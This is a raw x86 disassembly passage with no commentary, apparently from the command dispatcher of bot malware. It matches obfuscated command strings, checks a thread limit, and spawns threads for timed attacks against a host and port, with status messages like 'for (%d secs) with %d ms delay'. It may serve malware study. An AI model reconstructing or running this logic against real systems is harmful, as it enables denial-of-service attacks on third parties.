cmp [ebp+arg_18], 0
jnz short loc_4113EB
push eax
push ebx
push offset aBjatzQyrs11 ; "BjAtz/qyRS11"
push edi
push dword ptr [esi+0Ch]
push [ebp+arg_10]
call sub_41CE4A
add esp, 18h
loc_4113E1: ; CODE XREF: sub_40A9FE+69C5�j
cmp [ebp+arg_18], 0
jz loc_414995
loc_4113EB: ; CODE XREF: sub_40A9FE+69CB�j
push [ebp+arg_C]
push ebx
loc_4113EF: ; CODE XREF: sub_40A9FE+6B7B�j
push offset aBjatzQyrs11 ; "BjAtz/qyRS11"
jmp loc_41491C
; ---------------------------------------------------------------------------
loc_4113F9: ; CODE XREF: sub_40A9FE+69B5�j
mov eax, [ebp+arg_14]
mov [ebp+var_1160], eax
mov eax, [ebp+arg_18]
mov [ebp+var_1164], eax
cmp eax, edi
lea eax, [ebp+var_11F4]
jnz short loc_41141A
push dword ptr [esi+0Ch]
jmp short loc_41141C
; ---------------------------------------------------------------------------
loc_41141A: ; CODE XREF: sub_40A9FE+6A15�j
push dword ptr [esi]
loc_41141C: ; CODE XREF: sub_40A9FE+6A1A�j
push eax
call dword_4370B4 ; lstrcpyA
mov eax, [ebp+arg_10]
push 7Fh
mov [ebp+var_1278], eax
push dword ptr [ebx+4]
lea eax, [ebp+var_1274]
push eax
call sub_429D10
push dword ptr [ebx+8]
call sub_42A100
mov [ebp+var_1170], eax
push dword ptr [ebx+0Ch]
call sub_42A100
mov [ebp+var_116C], eax
push dword ptr [ebx+10h]
call sub_42A100
add esp, 18h
cmp [ebp+arg_14], 0
mov [ebp+var_1168], eax
mov edi, offset aSSDForDSecs_ ; "%s --> (%s:%d) for (%d secs)."
jnz short loc_4114A6
cmp [ebp+arg_18], 0
jnz short loc_4114AC
push dword ptr [ebx+0Ch]
call sub_42A100
pop ecx
push eax
push dword ptr [ebx+8]
call sub_42A100
pop ecx
push eax
push dword ptr [ebx+4]
push offset aBjatzQyrs11 ; "BjAtz/qyRS11"
push edi
push dword ptr [esi+0Ch]
push [ebp+arg_10]
call sub_41CE4A
add esp, 1Ch
loc_4114A6: ; CODE XREF: sub_40A9FE+6A75�j
cmp [ebp+arg_18], 0
jz short loc_4114D6
loc_4114AC: ; CODE XREF: sub_40A9FE+6A7B�j
push dword ptr [ebx+0Ch]
call sub_42A100
pop ecx
push eax
push dword ptr [ebx+8]
call sub_42A100
pop ecx
push eax
push dword ptr [ebx+4]
push offset aBjatzQyrs11 ; "BjAtz/qyRS11"
push edi
push dword ptr [esi]
push [ebp+arg_10]
call sub_41CDD4
add esp, 1Ch
loc_4114D6: ; CODE XREF: sub_40A9FE+6AAC�j
push dword ptr [ebx+0Ch]
call sub_42A100
pop ecx
push eax
push dword ptr [ebx+8]
call sub_42A100
pop ecx
push eax
push dword ptr [ebx+4]
push offset aBjatzQyrs11 ; "BjAtz/qyRS11"
push edi
push 0Dh
call sub_4234A7
add esp, 18h
mov [ebp+var_1174], eax
lea eax, [ebp+arg_0]
xor edi, edi
push eax
lea eax, [ebp+var_1278]
push edi
push eax
push offset sub_4229B7
push edi
push edi
call dword_437180 ; CreateThread
mov ecx, [ebp+var_1174]
imul ecx, 2724h
cmp eax, edi
mov dword_46D72C[ecx], eax
jnz short loc_411586
cmp [ebp+arg_14], 0
mov ebx, dword_437170
mov edi, offset aSSD_ ; "%s %s (%d)."
jnz short loc_411567
cmp [ebp+arg_18], 0
jnz short loc_411571
call ebx ; dword_437170
push eax
push offset a4ezrg1ye5hp1au ; "4Ezrg1ye5hp1AUz6N/Zzkas/bbUvL0k.zqt1cpO"...
push offset aBjatzQyrs11 ; "BjAtz/qyRS11"
push edi
push dword ptr [esi+0Ch]
push [ebp+arg_10]
call sub_41CE4A
add esp, 18h
loc_411567: ; CODE XREF: sub_40A9FE+6B45�j
cmp [ebp+arg_18], 0
jz loc_414995
loc_411571: ; CODE XREF: sub_40A9FE+6B4B�j
call ebx ; dword_437170
push eax
push offset a4ezrg1ye5hp1au ; "4Ezrg1ye5hp1AUz6N/Zzkas/bbUvL0k.zqt1cpO"...
jmp loc_4113EF
; ---------------------------------------------------------------------------
loc_41157E: ; CODE XREF: sub_40A9FE+6B8F�j
push 32h
call dword_437190 ; Sleep
loc_411586: ; CODE XREF: sub_40A9FE+6B34�j
cmp [ebp+var_115C], 0
jz short loc_41157E
jmp loc_414995
; ---------------------------------------------------------------------------
loc_411594: ; CODE XREF: sub_40A9FE+6986�j
; sub_40A9FE+698F�j ...
mov edi, offset aBjatzQyrs11 ; "BjAtz/qyRS11"
jmp loc_40BF10
; ---------------------------------------------------------------------------
loc_41159E: ; CODE XREF: sub_40A9FE+697B�j
push dword ptr [ebx]
push offset aW3dwl46o0u0 ; "w3dWL/46o0u0"
call edi ; dword_437178
test eax, eax
jnz short loc_4115B5
push offset aBjatzQyrs11 ; "BjAtz/qyRS11"
jmp loc_4128A9
; ---------------------------------------------------------------------------
loc_4115B5: ; CODE XREF: sub_40A9FE+6BAB�j
push dword ptr [ebx]
push offset aUbqs_hzpkh1 ; "/uBQS.HZPkh1"
call edi ; dword_437178
test eax, eax
jz loc_413C82
push dword ptr [ebx]
push offset a6x7zf1eztny_ ; "6x7zf1EztnY."
call edi ; dword_437178
test eax, eax
jz loc_413C82
push dword ptr [ebx]
push offset aFyflu0ji3xh_ ; "FyFlU0jI3XH."
call edi ; dword_437178
test eax, eax
jz loc_413C82
push dword ptr [ebx]
push offset a7otcu0fic6v0 ; "7otcU0FiC6V0"
call edi ; dword_437178
test eax, eax
jz loc_413C82
push dword ptr [ebx]
push offset aDnjyk0fwki__ ; "dnjYk0fWkI.."
call edi ; dword_437178
test eax, eax
jnz short loc_411610
push offset aBvygm_afzkh0 ; "BVYGm.aFzkh0"
jmp loc_4128A9
; ---------------------------------------------------------------------------
loc_411610: ; CODE XREF: sub_40A9FE+6C06�j
push dword ptr [ebx]
push offset aXmz20Gjkq ; "xMz20//gJkQ/"
call edi ; dword_437178
test eax, eax
jnz loc_411829
xor edi, edi
cmp [ebx+4], edi
jz loc_41181F
cmp [ebx+8], edi
jz loc_41181F
cmp [ebx+0Ch], edi
jz loc_41181F
push 0Dh
call sub_423800
cmp eax, 32h
pop ecx
mov [ebp+arg_C], eax
jle short loc_411692
cmp [ebp+arg_14], 0
mov ebx, offset aJqrlpUxr08Qqdu ; "JQrlp/UXr08/qqduw/ZeDHN/N/Wda.tYScO0znN"...
mov edi, offset aSSD_ ; "%s %s (%d)."
jnz short loc_41167A
cmp [ebp+arg_18], 0
jnz short loc_411684
push eax
push ebx
push offset aLcgg60qk2mf0 ; "Lcgg60QK2mf0"
push edi
push dword ptr [esi+0Ch]
push [ebp+arg_10]
call sub_41CE4A
add esp, 18h
loc_41167A: ; CODE XREF: sub_40A9FE+6C5E�j
cmp [ebp+arg_18], 0
jz loc_414995
loc_411684: ; CODE XREF: sub_40A9FE+6C64�j
push [ebp+arg_C]
push ebx
loc_411688: ; CODE XREF: sub_40A9FE+6E06�j
push offset aLcgg60qk2mf0 ; "Lcgg60QK2mf0"
jmp loc_41491C
; ---------------------------------------------------------------------------
loc_411692: ; CODE XREF: sub_40A9FE+6C4E�j
mov eax, [ebp+arg_14]
mov [ebp+var_1AF8], eax
mov eax, [ebp+arg_18]
mov [ebp+var_1AFC], eax
cmp eax, edi
lea eax, [ebp+var_1B90]
jnz short loc_4116B3
push dword ptr [esi+0Ch]
jmp short loc_4116B5
; ---------------------------------------------------------------------------
loc_4116B3: ; CODE XREF: sub_40A9FE+6CAE�j
push dword ptr [esi]
loc_4116B5: ; CODE XREF: sub_40A9FE+6CB3�j
push eax
call dword_4370B4 ; lstrcpyA
mov eax, [ebp+arg_10]
push 7Fh
mov [ebp+var_1C14], eax
push dword ptr [ebx+4]
lea eax, [ebp+var_1C10]
push eax
call sub_429D10
push dword ptr [ebx+8]
call sub_42A100
mov [ebp+var_1B08], eax
push dword ptr [ebx+0Ch]
call sub_42A100
add esp, 14h
cmp [ebp+arg_14], 0
mov [ebp+var_1B04], eax
mov edi, offset aLcgg60qk2mf0 ; "Lcgg60QK2mf0"
jnz short loc_411731
cmp [ebp+arg_18], 0
jnz short loc_411737
push dword ptr [ebx+0Ch]
call sub_42A100
pop ecx
push eax
push dword ptr [ebx+8]
call sub_42A100
pop ecx
push eax
push dword ptr [ebx+4]
push edi
push offset aSSForDSecsWith ; "%s --> (%s) for %d secs with %d ms dela"...
push dword ptr [esi+0Ch]
push [ebp+arg_10]
call sub_41CE4A
add esp, 1Ch
loc_411731: ; CODE XREF: sub_40A9FE+6D00�j
cmp [ebp+arg_18], 0
jz short loc_411761
loc_411737: ; CODE XREF: sub_40A9FE+6D06�j
push dword ptr [ebx+0Ch]
call sub_42A100
pop ecx
push eax
push dword ptr [ebx+8]
call sub_42A100
pop ecx
push eax
push dword ptr [ebx+4]
push edi
push offset aSSForDSecsWith ; "%s --> (%s) for %d secs with %d ms dela"...
push dword ptr [esi]
push [ebp+arg_10]
call sub_41CDD4
add esp, 1Ch
loc_411761: ; CODE XREF: sub_40A9FE+6D37�j
push dword ptr [ebx+0Ch]
call sub_42A100
pop ecx
push eax
push dword ptr [ebx+8]
call sub_42A100
pop ecx
push eax
push dword ptr [ebx+4]
push edi
push offset aSSForDSecsWith ; "%s --> (%s) for %d secs with %d ms dela"...
push 0Dh
call sub_4234A7
add esp, 18h
mov [ebp+var_1B10], eax
lea eax, [ebp+arg_0]
xor edi, edi
push eax
lea eax, [ebp+var_1C14]
push edi
push eax
push offset sub_4284A5
push edi
push edi
call dword_437180 ; CreateThread
mov ecx, [ebp+var_1B10]
imul ecx, 2724h
cmp eax, edi
mov dword_46D72C[ecx], eax
jnz short loc_411811
cmp [ebp+arg_14], 0
mov ebx, dword_437170
mov edi, offset aSSD_ ; "%s %s (%d)."
jnz short loc_4117F2
cmp [ebp+arg_18], 0
jnz short loc_4117FC
call ebx ; dword_437170
push eax
push offset a4ezrg1ye5hp1au ; "4Ezrg1ye5hp1AUz6N/Zzkas/bbUvL0k.zqt1cpO"...
push offset aLcgg60qk2mf0 ; "Lcgg60QK2mf0"
push edi
push dword ptr [esi+0Ch]
push [ebp+arg_10]
call sub_41CE4A
add esp, 18h
loc_4117F2: ; CODE XREF: sub_40A9FE+6DD0�j
cmp [ebp+arg_18], 0
jz loc_414995
loc_4117FC: ; CODE XREF: sub_40A9FE+6DD6�j
call ebx ; dword_437170
push eax
push offset a4ezrg1ye5hp1au ; "4Ezrg1ye5hp1AUz6N/Zzkas/bbUvL0k.zqt1cpO"...
jmp loc_411688
; ---------------------------------------------------------------------------
loc_411809: ; CODE XREF: sub_40A9FE+6E1A�j
push 32h
call dword_437190 ; Sleep
loc_411811: ; CODE XREF: sub_40A9FE+6DBF�j
cmp [ebp+var_1AF4], 0
jz short loc_411809
jmp loc_414995
; ---------------------------------------------------------------------------
loc_41181F: ; CODE XREF: sub_40A9FE+6C28�j
; sub_40A9FE+6C31�j ...
mov edi, offset aLcgg60qk2mf0 ; "Lcgg60QK2mf0"
jmp loc_40BF10
; ---------------------------------------------------------------------------
loc_411829: ; CODE XREF: sub_40A9FE+6C1D�j
push dword ptr [ebx]
push offset aNhr6r0qsk450 ; "nHr6r0qsk450"
call edi ; dword_437178
test eax, eax
jnz short loc_411840
push offset aLcgg60qk2mf0 ; "Lcgg60QK2mf0"
jmp loc_4128A9
; ---------------------------------------------------------------------------
loc_411840: ; CODE XREF: sub_40A9FE+6E36�j
push dword ptr [ebx]
push offset aUyfog_dvvny0 ; "UyfOG.DvVnY0"
call edi ; dword_437178
test eax, eax
jnz loc_411A81
xor edi, edi
cmp [ebx+4], edi
jz loc_411A77
cmp [ebx+8], edi
jz loc_411A77
cmp [ebx+0Ch], edi
jz loc_411A77
cmp [ebx+10h], edi
jz loc_411A77
push 0Dh
call sub_423800
cmp eax, 32h
pop ecx
mov [ebp+arg_C], eax
jle short loc_4118CD
loc_411887: ; CODE XREF: sub_40A9FE+70B8�j
; sub_40A9FE+7263�j ...
cmp [ebp+arg_14], 0
mov ebx, offset aJqrlpUxr08Qqdu ; "JQrlp/UXr08/qqduw/ZeDHN/N/Wda.tYScO0znN"...
mov edi, offset aSSD_ ; "%s %s (%d)."
jnz short loc_4118B5
cmp [ebp+arg_18], 0
jnz short loc_4118BF
push [ebp+arg_C]
push ebx
push offset aYhzck13caog0 ; "YhzCK13CaOG0"
push edi
push dword ptr [esi+0Ch]
push [ebp+arg_10]
call sub_41CE4A
add esp, 18h
loc_4118B5: ; CODE XREF: sub_40A9FE+6E97�j
cmp [ebp+arg_18], 0
jz loc_414995
loc_4118BF: ; CODE XREF: sub_40A9FE+6E9D�j
push [ebp+arg_C]
push ebx
loc_4118C3: ; CODE XREF: sub_40A9FE+705E�j
push offset aYhzck13caog0 ; "YhzCK13CaOG0"
jmp loc_41491C
; ---------------------------------------------------------------------------
loc_4118CD: ; CODE XREF: sub_40A9FE+6E87�j
mov eax, [ebp+arg_14]
mov [ebp+var_13A8], eax
mov eax, [ebp+arg_18]
mov [ebp+var_13AC], eax
cmp eax, edi
lea eax, [ebp+var_14C4]
jnz short loc_4118EE
push dword ptr [esi+0Ch]
jmp short loc_4118F0
; ---------------------------------------------------------------------------
loc_4118EE: ; CODE XREF: sub_40A9FE+6EE9�j
push dword ptr [esi]
loc_4118F0: ; CODE XREF: sub_40A9FE+6EEE�j
push eax
call dword_4370B4 ; lstrcpyA
mov eax, [ebp+arg_10]
push 7Fh
mov [ebp+var_14CC], eax
push dword ptr [ebx+4]
lea eax, [ebp+var_1444]
push eax
call sub_429D10
push dword ptr [ebx+8]
call sub_42A100
mov [ebp+var_13B8], eax
push dword ptr [ebx+0Ch]
call sub_42A100
mov [ebp+var_13B4], eax
push dword ptr [ebx+10h]
call sub_42A100
add esp, 18h
cmp eax, 1
mov [ebp+var_13BC], eax
jge short loc_41194D
loc_411943: ; CODE XREF: sub_40A9FE+7132�j
; sub_40A9FE+72DD�j
mov edi, offset aYhzck13caog0 ; "YhzCK13CaOG0"
jmp loc_413D77
; ---------------------------------------------------------------------------
loc_41194D: ; CODE XREF: sub_40A9FE+6F43�j
cmp [ebp+arg_14], 0
mov edi, offset aSSDForDSecs_ ; "%s --> (%s:%d) for (%d secs)."
jnz short loc_411989
cmp [ebp+arg_18], 0
jnz short loc_41198F
push dword ptr [ebx+0Ch]
call sub_42A100
pop ecx
push eax
push dword ptr [ebx+8]
call sub_42A100
pop ecx
push eax
push dword ptr [ebx+4]
push offset aYhzck13caog0 ; "YhzCK13CaOG0"
push edi
push dword ptr [esi+0Ch]
push [ebp+arg_10]
call sub_41CE4A
add esp, 1Ch
loc_411989: ; CODE XREF: sub_40A9FE+6F58�j
cmp [ebp+arg_18], 0
jz short loc_4119B9
loc_41198F: ; CODE XREF: sub_40A9FE+6F5E�j
push dword ptr [ebx+0Ch]
call sub_42A100
pop ecx
push eax
push dword ptr [ebx+8]
call sub_42A100
pop ecx
push eax
push dword ptr [ebx+4]
push offset aYhzck13caog0 ; "YhzCK13CaOG0"
push edi
push dword ptr [esi]
push [ebp+arg_10]
call sub_41CDD4
add esp, 1Ch
loc_4119B9: ; CODE XREF: sub_40A9FE+6F8F�j
push dword ptr [ebx+0Ch]
call sub_42A100
pop ecx
push eax
push dword ptr [ebx+8]
call sub_42A100
pop ecx
push eax
push dword ptr [ebx+4]
push offset aYhzck13caog0 ; "YhzCK13CaOG0"
push edi
push 0Dh
call sub_4234A7
add esp, 18h
mov [ebp+var_13B0], eax
lea eax, [ebp+arg_0]
xor edi, edi
push eax
lea eax, [ebp+var_14CC]
push edi
push eax
push offset sub_41DB6B
push edi
push edi
call dword_437180 ; CreateThread
mov ecx, [ebp+var_13B0]
imul ecx, 2724h
cmp eax, edi
mov dword_46D72C[ecx], eax
jnz short loc_411A69
loc_411A17: ; CODE XREF: sub_40A9FE+7200�j
; sub_40A9FE+73AB�j ...
cmp [ebp+arg_14], 0
mov ebx, dword_437170
mov edi, offset aSSD_ ; "%s %s (%d)."
jnz short loc_411A4A
cmp [ebp+arg_18], 0
jnz short loc_411A54
call ebx ; dword_437170
push eax
push offset a4ezrg1ye5hp1au ; "4Ezrg1ye5hp1AUz6N/Zzkas/bbUvL0k.zqt1cpO"...
push offset aYhzck13caog0 ; "YhzCK13CaOG0"
push edi
push dword ptr [esi+0Ch]
push [ebp+arg_10]
call sub_41CE4A
add esp, 18h
loc_411A4A: ; CODE XREF: sub_40A9FE+7028�j
cmp [ebp+arg_18], 0
jz loc_414995
loc_411A54: ; CODE XREF: sub_40A9FE+702E�j
call ebx ; dword_437170
push eax
push offset a4ezrg1ye5hp1au ; "4Ezrg1ye5hp1AUz6N/Zzkas/bbUvL0k.zqt1cpO"...
jmp loc_4118C3
; ---------------------------------------------------------------------------
loc_411A61: ; CODE XREF: sub_40A9FE+7072�j
push 32h
call dword_437190 ; Sleep
loc_411A69: ; CODE XREF: sub_40A9FE+7017�j
cmp [ebp+var_13A0], 0
jz short loc_411A61
jmp loc_414995
; ---------------------------------------------------------------------------
loc_411A77: ; CODE XREF: sub_40A9FE+6E58�j
; sub_40A9FE+6E61�j ...
mov edi, offset aYhzck13caog0 ; "YhzCK13CaOG0"
jmp loc_40BF10
; ---------------------------------------------------------------------------
loc_411A81: ; CODE XREF: sub_40A9FE+6E4D�j
push dword ptr [ebx]
push offset aPsern1aagh6_ ; "pSern1AAGh6."
call edi ; dword_437178
test eax, eax
jnz loc_411C1C
xor edi, edi
cmp [ebx+4], edi
jz short loc_411A77
cmp [ebx+8], edi
jz short loc_411A77
cmp [ebx+0Ch], edi
jz short loc_411A77
cmp [ebx+10h], edi
jz short loc_411A77
push 0Dh
call sub_423800
cmp eax, 32h
pop ecx
mov [ebp+arg_C], eax
jg loc_411887
mov eax, [ebp+arg_14]
mov [ebp+var_1608], eax
mov eax, [ebp+arg_18]
mov [ebp+var_160C], eax
cmp eax, edi
lea eax, [ebp+var_1724]
jnz short loc_411ADD
push dword ptr [esi+0Ch]
jmp short loc_411ADF
; ---------------------------------------------------------------------------
loc_411ADD: ; CODE XREF: sub_40A9FE+70D8�j
push dword ptr [esi]
loc_411ADF: ; CODE XREF: sub_40A9FE+70DD�j
push eax
call dword_4370B4 ; lstrcpyA
mov eax, [ebp+arg_10]
push 7Fh
mov [ebp+var_172C], eax
push dword ptr [ebx+4]
lea eax, [ebp+var_16A4]
push eax
call sub_429D10
push dword ptr [ebx+8]
call sub_42A100
mov [ebp+var_1618], eax
push dword ptr [ebx+0Ch]
call sub_42A100
mov [ebp+var_1614], eax
push dword ptr [ebx+10h]
call sub_42A100
add esp, 18h
cmp eax, 1
mov [ebp+var_161C], eax
jl loc_411943
cmp [ebp+arg_14], 0
mov edi, offset aSSDForDSecs_ ; "%s --> (%s:%d) for (%d secs)."
jnz short loc_411B72
cmp [ebp+arg_18], 0
jnz short loc_411B78
push dword ptr [ebx+0Ch]
call sub_42A100
pop ecx
push eax
push dword ptr [ebx+8]
call sub_42A100
pop ecx
push eax
push dword ptr [ebx+4]
push offset aYhzck13caog0 ; "YhzCK13CaOG0"
push edi
push dword ptr [esi+0Ch]
push [ebp+arg_10]
call sub_41CE4A
add esp, 1Ch
loc_411B72: ; CODE XREF: sub_40A9FE+7141�j
cmp [ebp+arg_18], 0
jz short loc_411BA2
loc_411B78: ; CODE XREF: sub_40A9FE+7147�j
push dword ptr [ebx+0Ch]
call sub_42A100
pop ecx
push eax
push dword ptr [ebx+8]
call sub_42A100
pop ecx
push eax
push dword ptr [ebx+4]
push offset aYhzck13caog0 ; "YhzCK13CaOG0"
push edi
push dword ptr [esi]
push [ebp+arg_10]
call sub_41CDD4
add esp, 1Ch
loc_411BA2: ; CODE XREF: sub_40A9FE+7178�j
push dword ptr [ebx+0Ch]
call sub_42A100
pop ecx
push eax
push dword ptr [ebx+8]
call sub_42A100
pop ecx
push eax
push dword ptr [ebx+4]
push offset aYhzck13caog0 ; "YhzCK13CaOG0"
push edi
push 0Dh
call sub_4234A7
add esp, 18h
mov [ebp+var_1610], eax
lea eax, [ebp+arg_0]
xor edi, edi
push eax
lea eax, [ebp+var_172C]
push edi
push eax
push offset sub_41DD09
push edi
push edi
call dword_437180 ; CreateThread
mov ecx, [ebp+var_1610]
imul ecx, 2724h
cmp eax, edi
mov dword_46D72C[ecx], eax
jz loc_411A17
jmp short loc_411C0E
; ---------------------------------------------------------------------------
loc_411C06: ; CODE XREF: sub_40A9FE+7217�j
push 32h
call dword_437190 ; Sleep
loc_411C0E: ; CODE XREF: sub_40A9FE+7206�j
cmp [ebp+var_1600], 0
jz short loc_411C06
jmp loc_414995
; ---------------------------------------------------------------------------
loc_411C1C: ; CODE XREF: sub_40A9FE+708E�j
push dword ptr [ebx]
push offset aXkg84_cesgs_ ; "XkG84.cESgs."
call edi ; dword_437178
test eax, eax
jnz loc_411DC7
xor edi, edi
cmp [ebx+4], edi
jz loc_411A77
cmp [ebx+8], edi
jz loc_411A77
cmp [ebx+0Ch], edi
jz loc_411A77
cmp [ebx+10h], edi
jz loc_411A77
push 0Dh
call sub_423800
cmp eax, 32h
pop ecx
mov [ebp+arg_C], eax
jg loc_411887
mov eax, [ebp+arg_14]
mov [ebp+var_14D8], eax
mov eax, [ebp+arg_18]
mov [ebp+var_14DC], eax
cmp eax, edi
lea eax, [ebp+var_15F4]
jnz short loc_411C88
push dword ptr [esi+0Ch]
jmp short loc_411C8A
; ---------------------------------------------------------------------------
loc_411C88: ; CODE XREF: sub_40A9FE+7283�j
push dword ptr [esi]
loc_411C8A: ; CODE XREF: sub_40A9FE+7288�j
push eax
call dword_4370B4 ; lstrcpyA
mov eax, [ebp+arg_10]
push 7Fh
mov [ebp+var_15FC], eax
push dword ptr [ebx+4]
lea eax, [ebp+var_1574]
push eax
call sub_429D10
push dword ptr [ebx+8]
call sub_42A100
mov [ebp+var_14E8], eax
push dword ptr [ebx+0Ch]
call sub_42A100
mov [ebp+var_14E4], eax
push dword ptr [ebx+10h]
call sub_42A100
add esp, 18h
cmp eax, 1
mov [ebp+var_14EC], eax
jl loc_411943
cmp [ebp+arg_14], 0
mov edi, offset aSSDForDSecs_ ; "%s --> (%s:%d) for (%d secs)."
jnz short loc_411D1D
cmp [ebp+arg_18], 0
jnz short loc_411D23
push dword ptr [ebx+0Ch]
call sub_42A100
pop ecx
push eax
push dword ptr [ebx+8]
call sub_42A100
pop ecx
push eax
push dword ptr [ebx+4]
push offset aYhzck13caog0 ; "YhzCK13CaOG0"
push edi
push dword ptr [esi+0Ch]
push [ebp+arg_10]
call sub_41CE4A
add esp, 1Ch
loc_411D1D: ; CODE XREF: sub_40A9FE+72EC�j
cmp [ebp+arg_18], 0
jz short loc_411D4D
loc_411D23: ; CODE XREF: sub_40A9FE+72F2�j
push dword ptr [ebx+0Ch]
call sub_42A100
pop ecx
push eax
push dword ptr [ebx+8]
call sub_42A100
pop ecx
push eax
push dword ptr [ebx+4]
push offset aYhzck13caog0 ; "YhzCK13CaOG0"
push edi
push dword ptr [esi]
push [ebp+arg_10]
call sub_41CDD4
add esp, 1Ch
loc_411D4D: ; CODE XREF: sub_40A9FE+7323�j
push dword ptr [ebx+0Ch]
call sub_42A100
pop ecx
push eax
push dword ptr [ebx+8]
call sub_42A100
pop ecx
push eax
push dword ptr [ebx+4]
push offset aYhzck13caog0 ; "YhzCK13CaOG0"
push edi
push 0Dh
call sub_4234A7
add esp, 18h
mov [ebp+var_14E0], eax
lea eax, [ebp+arg_0]
xor edi, edi
push eax
lea eax, [ebp+var_15FC]
push edi
push eax
push offset sub_41DE6E
push edi
push edi
call dword_437180 ; CreateThread
mov ecx, [ebp+var_14E0]
imul ecx, 2724h
cmp eax, edi
mov dword_46D72C[ecx], eax
jz loc_411A17
jmp short loc_411DB9
; ---------------------------------------------------------------------------
loc_411DB1: ; CODE XREF: sub_40A9FE+73C2�j
push 32h
call dword_437190 ; Sleep
loc_411DB9: ; CODE XREF: sub_40A9FE+73B1�j
cmp [ebp+var_14D0], 0
jz short loc_411DB1
jmp loc_414995
; ---------------------------------------------------------------------------
loc_411DC7: ; CODE XREF: sub_40A9FE+7229�j
push dword ptr [ebx]
push offset aP06vqBfbmo_ ; "p06vq/BFBMo."
call edi ; dword_437178
test eax, eax
jnz loc_411F3A
xor edi, edi
cmp [ebx+4], edi
jz loc_411A77
cmp [ebx+8], edi
jz loc_411A77
cmp [ebx+0Ch], edi
jz loc_411A77
push 0Dh
call sub_423800
cmp eax, 32h
pop ecx
mov [ebp+arg_C], eax
jg loc_411887
mov eax, [ebp+arg_14]
mov [ebp+var_1C20], eax
mov eax, [ebp+arg_18]
mov [ebp+var_1C24], eax
cmp eax, edi
lea eax, [ebp+var_1D3C]
jnz short loc_411E2A
push dword ptr [esi+0Ch]
jmp short loc_411E2C
; ---------------------------------------------------------------------------
loc_411E2A: ; CODE XREF: sub_40A9FE+7425�j
push dword ptr [esi]
loc_411E2C: ; CODE XREF: sub_40A9FE+742A�j
push eax
call dword_4370B4 ; lstrcpyA
mov eax, [ebp+arg_10]
push 7Fh
mov [ebp+var_1D44], eax
push dword ptr [ebx+4]
lea eax, [ebp+var_1CBC]
push eax
call sub_429D10
push dword ptr [ebx+8]
call sub_42A100
mov [ebp+var_1C2C], eax
push dword ptr [ebx+0Ch]
call sub_42A100
add esp, 14h
cmp eax, 1
mov [ebp+var_1C34], eax
mov edi, offset aYhzck13caog0 ; "YhzCK13CaOG0"
jl loc_413D77
cmp [ebp+arg_14], 0
jnz short loc_411EA6
cmp [ebp+arg_18], 0
jnz short loc_411EAC
push dword ptr [ebx+8]
call sub_42A100
push eax
push dword ptr [ebx+4]
push edi
push offset aSSForDSecs_ ; "%s --> (%s) for (%d secs)."
push dword ptr [esi+0Ch]
push [ebp+arg_10]
call sub_41CE4A
add esp, 1Ch
loc_411EA6: ; CODE XREF: sub_40A9FE+7480�j
cmp [ebp+arg_18], 0
jz short loc_411ECB
loc_411EAC: ; CODE XREF: sub_40A9FE+7486�j
push dword ptr [ebx+8]
call sub_42A100
push eax
push dword ptr [ebx+4]
push edi
push offset aSSForDSecs_ ; "%s --> (%s) for (%d secs)."
push dword ptr [esi]
push [ebp+arg_10]
call sub_41CDD4
add esp, 1Ch
loc_411ECB: ; CODE XREF: sub_40A9FE+74AC�j
push dword ptr [ebx+8]
call sub_42A100
push eax
push dword ptr [ebx+4]
push edi
push offset aSSForDSecs_ ; "%s --> (%s) for (%d secs)."
push 0Dh
call sub_4234A7
add esp, 18h
mov [ebp+var_1C28], eax
lea eax, [ebp+arg_0]
xor edi, edi
push eax
lea eax, [ebp+var_1D44]
push edi
push eax
push offset sub_41E242
push edi
push edi
call dword_437180 ; CreateThread
mov ecx, [ebp+var_1C28]
imul ecx, 2724h
cmp eax, edi
mov dword_46D72C[ecx], eax
jz loc_411A17
jmp short loc_411F2C
; ---------------------------------------------------------------------------
loc_411F24: ; CODE XREF: sub_40A9FE+7535�j
push 32h
call dword_437190 ; Sleep
loc_411F2C: ; CODE XREF: sub_40A9FE+7524�j
cmp [ebp+var_1C18], 0
jz short loc_411F24
jmp loc_414995
; ---------------------------------------------------------------------------
loc_411F3A: ; CODE XREF: sub_40A9FE+73D4�j
push dword ptr [ebx]
push offset a3vvsv1vurua ; "3VVsV1VuRUA/"
call edi ; dword_437178
test eax, eax
jnz short loc_411F51
push offset aYhzck13caog0 ; "YhzCK13CaOG0"
jmp loc_4128A9
; ---------------------------------------------------------------------------
loc_411F51: ; CODE XREF: sub_40A9FE+7547�j
push dword ptr [ebx]
push offset aImvbw1shwxq0 ; "iMvbW1SHwxQ0"
call edi ; dword_437178
test eax, eax
jnz loc_412169
xor edi, edi
cmp [ebx+4], edi
jz loc_41215F
cmp [ebx+8], edi
jz loc_41215F
cmp [ebx+0Ch], edi
jz loc_41215F
cmp [ebx+10h], edi
jz loc_41215F
push 0Dh
call sub_423800
cmp eax, 32h
pop ecx
mov [ebp+arg_C], eax
jle short loc_411FDC
cmp [ebp+arg_14], 0
mov ebx, offset aJqrlpUxr08Qqdu ; "JQrlp/UXr08/qqduw/ZeDHN/N/Wda.tYScO0znN"...
mov edi, offset aSSD_ ; "%s %s (%d)."
jnz short loc_411FC4
cmp [ebp+arg_18], 0
jnz short loc_411FCE
push eax
push ebx
push offset aAxauo_rlggx0 ; "aXauo.rLGgX0"
push edi
push dword ptr [esi+0Ch]
push [ebp+arg_10]
call sub_41CE4A
add esp, 18h
loc_411FC4: ; CODE XREF: sub_40A9FE+75A8�j
cmp [ebp+arg_18], 0
jz loc_414995
loc_411FCE: ; CODE XREF: sub_40A9FE+75AE�j
push [ebp+arg_C]
push ebx
loc_411FD2: ; CODE XREF: sub_40A9FE+7746�j
push offset aAxauo_rlggx0 ; "aXauo.rLGgX0"
jmp loc_41491C
; ---------------------------------------------------------------------------
loc_411FDC: ; CODE XREF: sub_40A9FE+7598�j
mov eax, [ebp+arg_14]
mov [ebp+var_1040], eax
mov eax, [ebp+arg_18]
mov [ebp+var_1044], eax
cmp eax, edi
lea eax, [ebp+var_10D4]
jnz short loc_411FFD
push dword ptr [esi+0Ch]
jmp short loc_411FFF
; ---------------------------------------------------------------------------
loc_411FFD: ; CODE XREF: sub_40A9FE+75F8�j
push dword ptr [esi]
loc_411FFF: ; CODE XREF: sub_40A9FE+75FD�j
push eax
call dword_4370B4 ; lstrcpyA
mov eax, [ebp+arg_10]
push 7Fh
mov [ebp+var_1158], eax
push dword ptr [ebx+4]
lea eax, [ebp+var_1154]
push eax
call sub_429D10
push dword ptr [ebx+8]
call sub_42A100
mov [ebp+var_1050], eax
push dword ptr [ebx+0Ch]
call sub_42A100
mov [ebp+var_1048], eax
push dword ptr [ebx+10h]
call sub_42A100
add esp, 18h
cmp eax, 1
